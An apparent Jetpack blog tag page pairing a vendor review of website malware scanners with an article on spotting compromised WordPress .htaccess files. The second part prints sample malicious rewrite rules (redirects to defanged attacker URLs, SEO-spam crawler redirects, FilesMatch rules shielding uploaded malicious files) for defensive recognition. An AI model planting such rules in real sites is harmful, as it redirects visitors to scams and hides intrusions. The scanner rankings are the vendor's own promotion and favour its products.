Tag: Vulnerabilities

As a website owner, you’ve worked hard to develop your website and build your business. But, with Google issuing over three million safe browsing warnings a day, it’s clear that you have to be vigilant against the ever-present threat of malware.

A single malware infection can cripple your website, damage your reputation, and even steal your customers’ data. That’s why it’s essential to have a reliable malware scanner in place to help you spot an infection as soon as it happens, so you can take steps to secure your site and get it back up and running.

With so many malware scanners available, it can be challenging to know which one to choose. However, thanks to our comprehensive review of the best website malware scanners, you’ll be able to determine the right option for you.

The top ten tools to scan a website for viruses and malware

1. Jetpack Protect

Jetpack Protect is one of the best ways to check your WordPress website for malware and keeps you one step ahead of security threats. This free plugin can be set up in just one click, and it’ll get to work checking your site daily for vulnerabilities that hackers could exploit to inject malware — so you can prevent issues before they start. And, with a paid upgrade, it will check your entire site for tens of thousands of known malware definitions and immediately alert you if something’s found.

Jetpack Protect allows you to secure your site without slowing it down, as it uses state-of-the-art decentralized scanning technology which can search your entire site — including the admin area, themes, and plugins — using Jetpack’s servers.

The plugin scans your site against an extensive database that is updated by dedicated WordPress security experts as soon as new vulnerabilities, viruses, or malware are discovered. If Jetpack Protect does detect an issue on your site, it will notify you via your Jetpack dashboard and will provide straightforward guidance to help you secure your site and remove malware from your WordPress site.

Jetpack Protect is made by Automattic, the team behind WordPress.com, which means it seamlessly integrates with any WordPress site. The tool uses the same technology used to guard some of the world’s leading brands, so you know you’re in good hands. 

Key features of Jetpack Protect:

• A simple one-click setup 
• Automatic ‘set it and forget it’ daily scans for vulnerabilities that keep your site secure 
• Scans of plugins, themes, and WordPress core for potential vulnerabilities 
• Recommended actions to help you resolve any issues that are found
• Automated daily malware scanning against over 37,000 definitions (paid)
• A Web Application Firewall (paid)
• Instant email notifications (paid)

 Pros of Jetpack Protect:

• As the automatic malware scans run on Jetpack’s servers, Jetpack Protect can scan your entire site without slowing it down.
• The plugin uses the same malware database as the advanced enterprise-level tool, WPScan, which is constantly updated by experienced online security experts.
• You can start protecting your site with just a single click, and it’ll run scans daily and notify you of any issues through your dashboard.

Cons of Jetpack Protect:

• Jetpack Protect was designed specifically for WordPress websites, so if your site doesn’t use WordPress, you’ll need to explore one of the other options on our list.
• While the plugin offers advice on resolving any security issues, it doesn’t provide automatic malware removal without a paid upgrade.

Ease of use:

Jetpack Protect is super simple to use, as it only takes one click to activate its advanced scanning tools. There is also no need to remember to run scans, as the plugin will protect your site automatically in the background. Detailed documentation is available, and if you need support, you can access Jetpack’s team of WordPress Happiness Engineers.

Pricing of Jetpack Protect:

Jetpack Protect is available for free from the WordPress plugin directory. 

2. Wordfence

Wordfence is a WordPress security plugin that offers a range of features to protect your website from malware, viruses, and other threats. One of the key features of Wordfence is its malware scanner, which automatically checks your website for malware and other vulnerabilities.

Wordfence is a server-side malware scanner (so it will use resources from your host) that allows you to check your entire website, including plugins and themes. The scanner looks for a wide range of vulnerabilities and signs of malware or viruses, including malicious redirects, backdoors, and code injections. 

In addition, Wordfence has a dedicated team of website security experts who regularly update its database with new malware and virus definitions, which are immediately available to premium customers so that your site is protected against the latest threats.

If Wordfence detects malware, it will automatically quarantine infected files, prevent them from being executed, and alert you via email. Wordfence can help you recover from simple malware attacks by replacing damaged core WordPress files with a clean version and deleting any malicious ones. Complete malware removal is included at some of the higher-tier subscription levels.

Key features of Wordfence:

• Automated malware and virus scanning
• Daily email alerts
• Basic repair and deletion functions for removing simple malware
• A range of other security features, including a firewall and access logging
• Regular malware definition updates (premium)
• Malware removal by a security expert (premium)

Pros of Wordfence:

• Wordfence conducts daily scans of your site and will email you if it notices any issues.
• Alongside the malware scanner, Wordfence also includes various other security features, including a Web Application Firewall (WAF) and two-factor authentication.

Cons of Wordfence:

• The free version of Wordfence only updates its malware definition 30 days after a new piece of malware is identified, meaning you have to upgrade to a paid plan if you want to detect the latest threats.
• Wordfence uses your server’s resources to conduct its scans, which could impact your site’s performance.
• Wordfence only works with WordPress websites.

Ease of use:

Wordfence requires configuration to ensure that it fully protects your site, but when it’s set up, its automatic scanning and notifications mean things are pretty hands-off. Sometimes the email alerts sent by Wordfence flag legitimate changes as a concern, which could cause confusion if you’re unfamiliar with website security and the WordPress ecosystem. 

Wordfence has comprehensive documentation and a learning center. Support is offered for free users through the plugin’s support forum and via email for premium subscribers. 

Pricing of Wordfence:

Wordfence offers a free plan, but there’s a 30-day delay between new discoveries of malware and when the free plan updates the database to include those discoveries in scans. 

Wordfence Premium costs $119 a year and includes daily malware database updates. 

Wordfence Care costs $490 a year, including installation and optimization of the plugin and malware removal by a WordPress security expert.

3. Sucuri

Sucuri is a well-known name in website security that offers a free malware scanner alongside several premium services that can help keep your site safe, including a web application firewall, DDoS protection, and malware removal.

Sucuri’s free SiteCheck external malware scanner allows you to scan the front end of your site for malware by entering its URL. If your website is built using WordPress, Sucuri offers a basic plugin that will check your site’s WordPress core files for any changes. 

Sucuri also offers premium plans, including automatic malware and virus scanning and access to a server-side scanner to check all your website files.

Key features of Sucuri:

• A free external malware scanner
• File integrity scanning 
• Security event logs 
• Automated malware scanning (premium)
• Server-side malware scanning (premium)
• Malware removal (premium)
• Blocklist monitoring (premium)
• A web application firewall (premium)

Pros of Sucuri:

• Sucuri’s SiteCheck scanner is free and doesn’t require an account.
• Sucuri is platform-agnostic, so it will work regardless of how your website is built.

Cons of Sucuri:

• Sucuri’s free malware scanner does not offer automatic scanning, so you must regularly visit the SiteCheck website and enter your URL to check your site for malware.
• Sucuri’s free SiteCheck scanner may not be able to spot all malware on your site. This is because the malware scan is conducted remotely, so it can only check for malware in the source code of the public-facing pages on your site. 
• If your site is built on WordPress, Sucuri says that their free WordPress malware scanner isn’t 100% accurate. Malware could be inserted into plugin files or other admin areas and, therefore, wouldn’t appear on your site’s front end.

Ease of use:

Sucuri’s free malware scanner is simple to use as it only requires your website URL. However, unless you subscribe to a premium plan, you need to remember to manually run the scan to ensure you spot any malware or virus infections. 

The server-side scanner could be confusing for non-technical website owners to set up, as it requires FTP/SFTP credentials. Sucuri offers a range of guides and documentation, and its premium customers are offered email support.

Pricing of Sucuri:

Sucuri SiteCheck and their WordPress plugin are free of charge. Premium subscriptions start at $199 a year and include a range of features, including server-side automatic malware scanning, a web application firewall, and unlimited malware removal. 

4. MalCare

MalCare is a malware scanning and removal service specifically for WordPress websites. The plugin offers automatic malware scanning alongside other security features, including a web application firewall to prevent attackers from accessing your site.

MalCare’s malware scanner will automatically scan your entire site, including admin files, plugins, and themes. The plugin temporarily and securely copies your files to its servers to conduct each malware scan, meaning that scans won’t slow down your site. 

MalCare also monitors your website’s files and databases and will let you know if it spots a change that it thinks could be the result of malware. If it thinks you have a malware or virus infection, it will alert you by email, and the plugin’s premium version offers automatic malware removal.

Key features of MalCare:

• A malware scanner with automatic daily scanning
• Vulnerability detection
• Monitoring for suspicious file changes
• A web application firewall
• Automated malware cleaning (premium)

Pros of MalCare:

• MalCare offers automatic daily malware scans, which can check your entire site.
• The plugin uses MalCare’s servers to carry out its malware scanning, meaning it won’t slow down your site.
• MalCare will send you an alert by email if it finds any signs of a malware infection, so you can take action to secure your site.

Cons of MalCare:

• While the free version of the plugin will tell you if your site is infected with malware, it won’t let you know where it is. Instead, you must upgrade to a premium plan to locate and remove the infection.
• MalCare is a solution specifically designed for WordPress website owners to check their site for malware, so if your site does not use WordPress, you’ll need to explore one of the other options on our list.

Ease of use:

MalCare is easy to install and set up, and its automatic scans mean you don’t need to remember to scan your site. The automated malware removal in its premium version makes it simple to recover your site from most infections. MalCare offers email support for all users and live chat support for premium users.

Pricing of MalCare:

There’s a free version available from the WordPress plugin directory. Premium plans include malware removal and start at $99 a year.

5. Jetpack Scan 

Jetpack Scan is one of the best ways for WordPress website owners to check their sites for malware and viruses. Jetpack Scan acts as a security guard who constantly watches over your site, taking all the stress out of protecting your site from the latest security threats.

Jetpack Scan is a premium feature of the Jetpack plugin, which is maintained by Automattic — the same people who are behind WordPress.com, WPScan, and WooCommerce. This means you’ll benefit from the expertise of dedicated WordPress security specialists, who ensure that the vulnerability database used by Jetpack Scan is kept up to date with the latest malware, viruses, and exploits.

As soon as it’s installed, Jetpack Scan gets to work, scouring your site for malware and vulnerabilities. 

If an issue is detected, it’ll notify you immediately and provide clear guidance about any identified threats. And, in most cases, Jetpack Scan will offer simple, one-click fixes, so you can get back to running your site.

Even if your site has been taken offline by a malware attack, you can still see the results of the latest malware scan and implement most one-click fixes from the cloud, meaning you’ll be able to quickly get your site back up and running.

Jetpack Scan uses clever decentralized scanning technology to scan your entire website, including admin pages, themes, and plugins. It does so with Automattic’s servers, allowing you to benefit from the same protection enjoyed by millions of WordPress websites without slowing down your site. You’ll also get access to other security features, including a web application firewall. You can benefit from even more features, including automated backups and spam protection, by purchasing the Jetpack Security bundle.  

 Key features of Jetpack Scan:

• Automated daily scanning
• Instant email notifications if any issues are found
• One-click fixes to resolve the majority of security threats
• The ability to access your scan results and one-click fixes even if your site is down
• A vulnerability database updated by WordPress security experts
• A web application firewall to help keep hackers out of your site 
• Priority support from Jetpack’s WordPress Happiness Engineers

Pros of Jetpack Scan:

• As Jetpack Scan keeps watch over your site through its automated daily scans, you can ‘set it and forget it’ and rest easy knowing that you’ll be notified immediately if anything’s ever found.
• Jetpack Scan offers one-click fixes for most malware infections and security vulnerabilities.
• Jetpack Scan integrates seamlessly with WordPress and WooCommerce and works alongside other Jetpack features, including VaultPress Backup.

Cons of Jetpack Scan:

• Jetpack Scan was designed specifically for WordPress websites, so if your site doesn’t use WordPress, you’ll need to explore another option on this list.

Ease of use:

Jetpack Scan is simple to set up and use. Its automated scans mean you don’t have to worry about remembering to scan your site, and one-click fixes make solving the majority of security issues simple. Plus, detailed documentation and priority support from Jetpack’s team of Happiness Engineers is available for all Jetpack Scan users.

Pricing of Jetpack Scan:

Jetpack Scan is available through the Jetpack plugin or as an upgrade to the Jetpack Protect plugin for just $10 a month. You can also benefit from Jetpack Scan by purchasing Jetpack’s Security or Complete bundles.

6. IsItWP Security Scanner

IsItWP provides a range of tools for site owners, including a website malware scanner, which can check any website for malware and other security vulnerabilities. IsItWP’s scanner is powered by Sucuri, allowing you to scan your site’s front end pages for malware by entering its URL.

In addition to checking your site for malware and viruses, IsItWP’s scanner also checks if your site is listed in Google’s Safe Browsing and other malware blocklists.

Key features of IsItWP Security Scanner:

• The ability to check any website’s public-facing pages for malware and viruses
• Reports that outline if malware is found or if the website is on Google’s Safe Browsing or other malware blocklists

Pros of IsItWP Security Scanner:

• It allows you to check any website for malware by simply entering its URL.

Cons of IsItWP Security Scanner:

• There’s no automated scanning option, meaning you must remember to visit IsItWP to check your site for malware.
• The scanner can only find malware that is present on the front end pages of your website.
• If malware or viruses are detected, IsItWP doesn’t provide any guidance or tools to help you remove the malware and restore your site.
• The online scanner is slower than many others on this list.

Ease of use:

IsItWP Security Scanner is easy to use as it only requires you to enter your website’s URL to check it for malware.

Pricing of IsItWP Security Scanner:

IsItWP Security Scanner is free to use.

7. SiteLock

SiteLock offers a range of malware detection and removal services, including a free online malware scanner.

SiteLock’s free scanner allows you to check the public-facing pages of any website for malware. The web-based scanner returns results in under 60 seconds and also checks for any known viruses or other vulnerabilities.

SiteLock also offers a number of premium plans which offer automated scans, notifications, and automatic malware removal. Premium customers can also scan their entire website, including admin pages, plugins, and files, using SiteLock’s cloud servers so that website performance is not impacted. 

Premium scans also check for additional security concerns, including SQL injections and cross-site scripting, as well as your website’s status on malware blacklists.

Key features of SiteLock:

• A free, web-based malware scanner
• Automated daily scans (premium)
• Automatic malware removal (premium)
• Additional security features including a web application firewall and DDoS protection (premium)

Pros of SiteLock:

• SiteLock’s free online malware scanner is quicker than many others and provides results in an easy-to-understand format.
• SiteLock’s premium plans feature automated malware removal, so malware is removed from your site as soon as it’s identified.

Cons of SiteLock:

• Automated scanning is only available on premium plans.
• While SiteLock supports WordPress and other content management systems, its plugin is not widely used.

Ease of use:

The web-based scanner is easy to use and returns results quickly. For SiteLock’s premium features to work, you must provide FTP/SFTP details, which could be confusing for some users. Email support, with a guaranteed 30-hour response time, is provided to all premium customers.

Pricing of SiteLock:

SiteLock’s online scanner is free. Premium plans, which include automated scans of all areas of your site and malware removal, start at $15 a month.

8. Detectify

Detectify is a cybersecurity company that offers a range of options to check websites and web apps for malware and viruses. Detectify is designed specifically for complex DevOps environments. It can be configured to run either on-demand or scheduled security scans that look at your entire website, including back-end resources.

In addition to malware, Detectify will scan your server for a wide range of other security risks and vulnerabilities, including SQL injections, authentication vulnerabilities, and SSL issues. Scans also check your site against a unique list of exploits gathered from the hacker community to help keep your site secure from the latest threats.

Detectify will integrate into your existing workflow to inform you of the results of its scans through tools such as Slack or Jira so that you can take action to address any issues it has identified. 

Key features of Detectify:

• Enterprise-grade malware and vulnerability scanning
• Scans for a wide range of potential security issues
• Scans of your entire website
• Multiple scan profiles

Pros of Detectify:

• Detectify offers a high level of security for complex web apps and websites that checks for a range of vulnerabilities, including malware and viruses.

Cons of Detectify:

• Detectify is an enterprise-grade service, and therefore it offers many features that most website owners may not need.
• Due to its advanced features, Detectify is significantly more expensive than any other option on this list.

Ease of use:

Due to its range of options and scan profiles, Detectify is more complex to set up than many other options on this list. It may require the support of a DevOps specialist to integrate with your website.

Pricing of Detectify:

Detectify plans are customizable, but start at around $80 per month.

9. Quttera

Quttera is an established name in website security, and they offer a number of different solutions to check your website for malware, including a free online malware scanner. All of Quttera’s solutions use a patented malware-detection algorithm that it claims can detect previously unknown malware rather than checking your site’s files against a list of malware definitions.

Quttera’s online malware scanner can only check the front end of your website. But, if your website is built using WordPress, then Quttera’s free plugin will scan your entire site for malware, including admin pages and plugins. A detailed report is provided after each scan, which identifies any malicious or suspicious files, and lets you know your site’s status on several common malware blocklists.

Quttera’s premium ThreatSign! product offers automated malware scanning, including server-side scanning for all websites, and automated malware removal is provided with some plans.

Key features of Quttera:

• A web-based malware scanner
• A WordPress plugin that checks all website files
• Malware blocklist checking
• Automated scanning (premium only)
• Malware removal (premium only)
• Additional security features, including a web application firewall and DDoS protection (premium only)

Pros of Quttera:

• The free report provided by Quttera is more detailed than the reports provided by other free tools on this list.
• Quttera’s server-side scanning, available via their WordPress plugin and premium plans, uses their cloud servers to conduct the scan, meaning it won’t slow down your site.
• Quttera’s malware detection algorithm can detect previously unknown malware.

Cons of Quttera:

• It scans using the free web-based tool can only check the front end of your site.
• Automatic scanning is only available on premium plans.

Ease of use:

Quttera’s web-based scanner and WordPress plugin are both easy to use, but the lack of automation means that you need to remember to check your site regularly for malware. Support is only available to premium subscribers.

Pricing of Quttera:

Quttera’s web-based scanner and WordPress plugin are free. Premium plans offer automatic scanning and other security features for $10 a month, with plans that offer malware removal starting at $179 a year.

10. Google Transparency Report

Google’s Transparency Report provides information on Google’s services, and has a section dedicated to its Safe Browsing technology. Site owners can enter their URL and check its Safe Browsing status to see if it has been flagged as unsafe by Google.

Safe Browsing is Google’s technology that checks websites for malware and phishing attacks and flags them as unsafe for visitors if they’re potentially malicious. 

Key features of Google’s Transparency Report:

• Includes a tool that checks if a site has been identified as unsafe
• Reports that offer a basic reason for the site being listed as unsafe

Pros of Google’s Transparency Report:

• The Safe Browsing status check allows website owners to see if Google has identified signs of malware on their site.
• The service is free of charge and can be used by anyone to check the status of a site.

Cons of Google’s Transparency Report:

• The Safe Browsing status check is not automatic, meaning you must remember to check your site’s status.
• Google Transparency Report’s Safe Browsing status check section is not a substitute for a comprehensive malware scanning solution because it’s not proactive and only reports issues after visitors are likely to have been affected.
• Google’s Safe Browsing technology does not scan every website, and the frequency of scans is not publicly available.
• The Safe Browsing status check does not provide any guidance on how to remove malware if it’s identified on your site.

Ease of use:

The Google Transparency Report Safe Browsing status check is easy to use and quickly returns the Safe Browsing status for the URL you enter.

Pricing of Google’s Transparency Report:

Google’s Transparency Report is free to use.

A comparison of the best website malware scanners

 Frequently asked questions about malware scanners

What is the best website scanner to check for viruses and malware?

The best website scanner to check for viruses and malware will depend on the platform or CMS your site is built on.

For example, WordPress site owners should opt for a malware scanner that’s built specifically for WordPress, and it’s clear from our review that Jetpack Protect is the best option. It offers automated scans for vulnerabilities with premium access to a malware database that’s constantly updated by a team of WordPress security experts, so you can be sure your site is being checked for the latest issues. 

Or you could use the premium Jetpack Scan feature available with the Jetpack plugin. 

Both Jetpack Scan and the paid upgrade for Jetpack Protect offer clear guidance and one-click fixes if a security threat is identified, along with a web application firewall to keep malicious actors off of your site.

Should I use an external or server-side malware scanner?

Many of the free website scanners only search the external pages of your website for malware, and this means that they won’t spot issues that are hidden on the back end of your site. 

In contrast, server-side malware scanners offer full protection, since they scan the entirety of your site. But, if the malware scanning happens on your server, it could temporarily slow down your website performance. This means the best option to scan your site for malware is to use a tool that uses decentralized scanning technology. 

For example, Jetpack Protect uses Automattic’s cloud servers to securely scan the front and back ends of your site, meaning you don’t have to worry about the impact on performance while its comprehensive automated scans are being carried out.

How do I scan a WordPress website for malware?

To scan your WordPress site for malware, you’ll need to use a malware scanner such as Jetpack Protect that can scan your entire website, including your plugins and themes.

You can install Jetpack Protect for free by going to Plugins → Add New inside of your WordPress dashboard. Then, search for “Jetpack Protect” and click Install Now → Activate.

Then, choose either Jetpack Protect or upgrade to benefit from additional features, including one-click malware fixes and a web application firewall.

Jetpack Protect will then get to work scanning your entire site for malware.

Once its scan is complete, you’ll be shown the results and told if any security threats have been identified on your site. If Jetpack Protect has identified any issues, it’ll give you a clear description of the issue and let you know where it’s located.

Jetpack Protect will automatically scan your site for vulnerabilities every day. You can see the results of your scans by going to your WordPress admin dashboard menu and selecting Jetpack →  Protect.

You can also run a manual scan at any time by clicking Scan Now.

How can I prevent my website from being affected or hacked in the future?

While regular automated scanning will help you detect a malware infection, keeping it secure is the best way to protect your site. Here are some ways you can do this:

• Use strong passwords. The easier your password is to guess, the more likely it is that a malicious hacker will be able to guess it to get access to your website and install malware. Learn more about securing your WordPress login page.
• Enable secure authentication. Secure authentication requires users to provide a code from their mobile device alongside their username and password, meaning that if someone does happen to crack your password, they still can’t log in and cause damage to your site.
• Limit admin user accounts. By limiting the number of users who can have full access to your site, you reduce the number of accounts that could become compromised and used to infect your site with malware.
• Keep your site up to date. By keeping the software up to date, including any plugins and themes, you’ll benefit from the latest security improvements and vulnerability patches.
• Get protection against brute force attacks. Brute force protection stops bots who try to guess hundreds of username/password combinations each second until they find one that lets them into your site.
• Use a web application firewall. Firewalls help prevent attackers from gaining access to your site and are essential for all website owners. For example, Jetpack Scan includes a firewall specifically designed for WordPress sites that uses a vast database to help it identify potentially malicious visitors. 

WordPress site owners can help keep their site secure and prevent malware infections by using a complete WordPress security solution such as Jetpack Security, which includes advanced features including backups, Jetpack Scan, and protection from spam.

You learned about the importance of the .htaccess file in our blog post How to Access and Edit the Default WordPress .htaccess File. As you can imagine, an important file such as .htaccess can be a target for bad actors. In this article, we’ll point out cases and indicators of compromise that affect this file.

Malicious redirects

Attackers can setup redirects on the .htaccess files that will redirect visitors based on specific conditions. The final destination can be a website containing other malicious content, spam, phishing campains, or other types of scam.

Those redirects will rely on the function RewriteRule and will sometimes be preceeded by the conditions set by RewriteCond, just as a default .htaccess file would do. This can make spotting those bad codes hard for users that aren’t familiar with the website’s configuration.

Examples of this type of malware are (URLs were invalid):

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ hxxp://celeirodoalgarvio[.]com/azzf.html?h=717013 [L,R]
</IfModule>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).txt$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
RewriteRule ^([A-Za-z0-9-]+).htm$ hxxps://getyourprizenow[.]life/?u=y2ykaew&o=2xup89r&m=1&t=m2rdhta [L]
</IfModule>

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} "iPhone|android"[NC]
RewriteRule ^(.*)$ hxxp://176[.]102[.]34[.]137/safezone [L,R=302]

SEO spam

Very similar to the malicious redirects case, this bad code will target search engines instead of the end user, redirecting their crawling attempts to malicious pages written to boost other websites, usually related to scams.

In the condition you’ll find it looking for the search engines on referrers and user-agents, as in the following example:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ default.php [L,QSA]
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [NC,OR]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA]
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC]
RewriteCond %{HTTP_REFERER} (yahoo|bing|google|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA] 
RewriteCond %{HTTP_USER_AGENT} (bing|google|yahoo|msn|aol) [OR,NC] 
RewriteCond %{HTTP_REFERER} (bing|google|yahoo|msn|aol)
RewriteRule ^(.*)$ inc.php [L,QSA]

Allowing bad code

Sometimes the attacker wants to make sure to protect the malicious file they uploaded to the site from competitors or other people poking around. Or they want to make sure that their malicious file will be opened by overriding the parent directory configuration.

For those cases a FilesMatch condition will be created and specific files or extensions will be listed, as in the example below:

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

What to do if my site was infected?

If you find the .htaccess file on your website was compromised the first thing you should do is to restore it to a working version, which will preserve your site’s permalinks and redirects. Please refer again to How to Access and Edit the Default WordPress .htaccess File. And then follow these steps:

• Change all admin user’s passwords and make sure you’re using multi-factor authentication.
• Review all WordPress users and remove the ones you don’t recognize (especially the admin ones).
• Review for unused or unknown themes and plugins and remove anything unnecessary or unknown.
• Reinstall all your plugins since they may have been compromised.
• Review your theme for added or changed files that weren’t added or changed with your consent.
• Reinstall WordPress core files.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. The Jetpack Security bundle is one great WordPress security option to ensure your site and visitors are safe. This product includes real-time malware scanning, site backups, comment and form spam protection from Akismet, brute force attack protection, and more.